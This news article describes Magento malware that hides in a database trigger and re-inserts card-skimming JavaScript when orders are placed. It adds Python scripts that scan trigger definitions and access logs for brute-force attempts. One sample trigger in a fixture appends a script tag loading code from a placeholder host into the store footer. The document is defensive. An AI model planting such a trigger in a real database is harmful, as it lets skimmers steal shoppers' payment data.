Researchers Discover Self-Healing Malware That Targets Magento Stores


Dutch malware experts have found a new malware strain that targets online shops running on the Magento platform, which can self-heal using code hidden in the website’s database.

While this is not the first web malware to hide code in a website’s database, it is the first written in SQL as a stored procedure, in this case a Magento database trigger.

Malware hidden in SQL stored procedure

Discovered by Jeroen Boersma and analyzed by Willem de Groot, this malware starts execution whenever a user places a new order.

When this happens, a malicious database trigger (a set of automated SQL operations, also known as a stored procedure) executes before Magento puts together the PHP code and assembles the page.

This database trigger checks whether the malware’s malicious JavaScript code is still present in the store’s header, footer, and copyright section. It also checks the various Magento CMS blocks where the malicious code could reside.

If it finds no trace of its JavaScript code, the database trigger’s instructions re-insert it into the site’s source code via a series of SQL operations.
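Because the persistence logic lives in a trigger rather than in the rendered page, a database dump scan for script tags will not show where the re-insertion comes from; the trigger definitions themselves have to be reviewed. The following is an added example, not code from the article or from de Groot’s tools: it shows the MySQL query that lists a schema’s triggers (information_schema.TRIGGERS is a standard MySQL view) and a heuristic review of the returned rows that flags a trigger firing on an order table yet writing script markup into the tables Magento renders into every page. The table names, trigger names and trigger bodies in SAMPLE_ROWS are constructed for the demonstration.

```python
"""Review MySQL trigger definitions for Magento content-injection persistence."""
import re
from dataclasses import dataclass, field

# Query to run against the store's MySQL instance; the rows it returns have the
# shape of the constructed SAMPLE_ROWS below.
TRIGGER_QUERY = """
SELECT TRIGGER_NAME, EVENT_MANIPULATION, EVENT_OBJECT_TABLE, ACTION_STATEMENT
FROM information_schema.TRIGGERS
WHERE TRIGGER_SCHEMA = DATABASE();
"""

# Tables whose contents Magento renders into storefront pages (header/footer
# config, CMS blocks and pages).
CONTENT_TABLES = ("core_config_data", "cms_block", "cms_page")
# Order-pipeline tables; a trigger that fires here but edits page content is out of place.
ORDER_TABLES = ("sales_flat_order", "sales_flat_quote", "sales_order")
SCRIPT_RE = re.compile(r"<\s*script|javascript:|String\.fromCharCode|eval\s*\(", re.I)
WRITE_RE = re.compile(r"\b(update|insert|replace)\b", re.I)


@dataclass
class Finding:
    trigger: str
    reasons: list = field(default_factory=list)


def review_trigger(name, event, table, body):
    """Return a Finding for a suspicious trigger definition, or None if it looks benign."""
    reasons = []
    lower = body.lower()
    touched = [t for t in CONTENT_TABLES if t in lower]
    if touched and WRITE_RE.search(body):
        reasons.append("writes to storefront content table(s): " + ", ".join(touched))
    if SCRIPT_RE.search(body):
        reasons.append("body embeds script/JavaScript markup")
    if table.lower() in ORDER_TABLES and touched:
        reasons.append(f"fires on {event} of order table {table} but edits page content")
    return Finding(name, reasons) if reasons else None


def scan_triggers(rows):
    """Apply review_trigger to every information_schema.TRIGGERS row; return the findings."""
    findings = []
    for row in rows:
        finding = review_trigger(
            row["TRIGGER_NAME"], row["EVENT_MANIPULATION"],
            row["EVENT_OBJECT_TABLE"], row["ACTION_STATEMENT"],
        )
        if finding:
            findings.append(finding)
    return findings


# Constructed sample rows (not from a real store): a legitimate audit trigger and
# one modelled on the behaviour described in the article, with a placeholder host.
SAMPLE_ROWS = [
    {"TRIGGER_NAME": "trg_order_audit", "EVENT_MANIPULATION": "INSERT",
     "EVENT_OBJECT_TABLE": "sales_flat_order",
     "ACTION_STATEMENT": "BEGIN INSERT INTO order_audit_log (order_id, created_at) "
                         "VALUES (NEW.entity_id, NOW()); END"},
    {"TRIGGER_NAME": "trg_reinsert", "EVENT_MANIPULATION": "INSERT",
     "EVENT_OBJECT_TABLE": "sales_flat_order",
     "ACTION_STATEMENT": "BEGIN UPDATE core_config_data SET value = CONCAT(value, "
                         "'<script src=\"//PLACEHOLDER-HOST/x.js\"></script>') "
                         "WHERE path LIKE 'design/footer/%'; END"},
]

if __name__ == "__main__":
    for f in scan_triggers(SAMPLE_ROWS):
        print(f.trigger)
        for reason in f.reasons:
            print("  -", reason)
```

The heuristics are deliberately broad: any trigger that writes to a content table from an order event deserves a manual look, since legitimate Magento installs do not ship such triggers and a compromised one can be rewritten to avoid any single keyword.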

First Magento malware that uses SQL stored procedures

This “self-healing” behavior, as de Groot describes it, is a first for Magento malware.

“Malware was stored in [databases] before, but only as text,” de Groot said speaking to Bleeping Computer.

“You could scan a dump of your database and know whether it contains malicious stuff. But now, the actual malware is executed inside the DB,” de Groot said. “This is the first time I see malware written in SQL. Previously, malware was written in JS or PHP.”

Malware is harder to remove, will survive basic clean operations

This Magento malware also has JS and PHP components that take care of stealing users’ card information, but the SQL part is new. According to de Groot, the SQL part exists to keep the malware alive for as long as possible.

“The malware got resilient against removal attempts,” he said. “The malware [now] attacks the DB instead of the e-commerce app.”

According to de Groot, this particular malware strain appears to infect databases following brute-force attacks on the /rss/catalog/notifystock/ URL, even on fully patched shops.
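A store owner can look for that brute-force activity in the web server’s access logs before the database is ever touched. The script below is an added example, not from the article or from de Groot’s tools: it parses Apache-style combined log lines and reports clients that produced a burst of failed requests against the /rss/catalog/notifystock/ path. It assumes that a failed credential attempt on that endpoint is logged with HTTP status 401; the log lines, addresses and threshold are constructed for the demonstration.

```python
"""Flag clients hammering the Magento notifystock RSS endpoint with failed requests."""
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TARGET_PATH = "/rss/catalog/notifystock"
FAILED_STATUS = "401"  # assumption: rejected credentials on this endpoint log as 401


def flag_brute_force(lines, threshold=5, window_s=300, path_prefix=TARGET_PATH):
    """Return {client_ip: max_failures_in_window} for clients that reached the threshold."""
    attempts = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as combined log entries
        ip, ts, _method, path, status = m.groups()
        if not path.startswith(path_prefix) or status != FAILED_STATUS:
            continue
        attempts[ip].append(datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"))

    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # slide the window start forward until it spans at most window_s seconds
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and count > flagged.get(ip, 0):
                flagged[ip] = count
    return flagged


# Constructed sample log (documentation-range addresses, not real traffic):
# one client makes six failed attempts in eight seconds, another fails once then
# succeeds, and a third is ordinary storefront traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2017:10:01:01 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2017:10:01:03 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2017:10:01:04 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2017:10:01:06 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2017:10:01:07 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2017:10:01:09 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2017:10:05:00 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2017:10:05:09 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Feb/2017:10:06:00 +0000] "GET /index.php/checkout/cart/ HTTP/1.1" 200 9831 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, count in flag_brute_force(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} failed notifystock requests within the window")
```

Run it against a real access log with `flag_brute_force(open(path).readlines())`; the threshold and window should be tuned to the store’s normal admin RSS usage, which is typically a handful of requests per day from a known address.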

The researcher lists removal steps for this malicious Magento database trigger on his site. Store owners can scan their shops via de Groot’s two tools, MageReport and the Magento Malware Scanner, which have received updates to detect this new class of malware.